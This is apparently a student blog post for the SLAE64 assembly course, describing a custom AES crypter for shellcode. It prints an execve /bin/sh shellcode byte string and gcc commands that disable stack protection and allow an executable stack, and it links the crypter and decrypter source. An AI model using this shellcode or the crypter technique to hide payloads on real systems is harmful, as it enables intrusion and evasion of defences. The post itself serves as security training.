This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert (SLAE64) certification:
https://www.pentesteracademy.com/course?id=7
Student-ID: PA-15847
The Objectives for the Assignment:
- create a custom crypter
- free to use any existing encryption schema
- can use any programming language
We’ll use the following encryption script for this assignment:
I used the following encoder for this purpose:
https://github.com/kokke/tiny-AES128-C
I used the Execve Shellcode as we wrote during the course:
"\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43";
We’ll compile the file:
gcc assignment7-crypter.c -o assignment7-crypter
And then run the crypter file to have the encoded shellcode:
https://github.com/areyou1or0/SLAE64/blob/main/assignment7-crypter.c
Then we’ll run the following decoder to get the same decoded shellcode
https://github.com/areyou1or0/SLAE64/blob/main/assignment7-decrypter.c
Here’s the command for the compilation:
gcc assignment7-decrypter.c assignment7-aes.c -o decrypter -fno-stack-protector -z execstack
This will give us the original shellcode back.
So this was the last assignment of the SLAE64 course. Hope you enjoyed them as much as I did 🙂
You can find the sourcecode in my Github repository: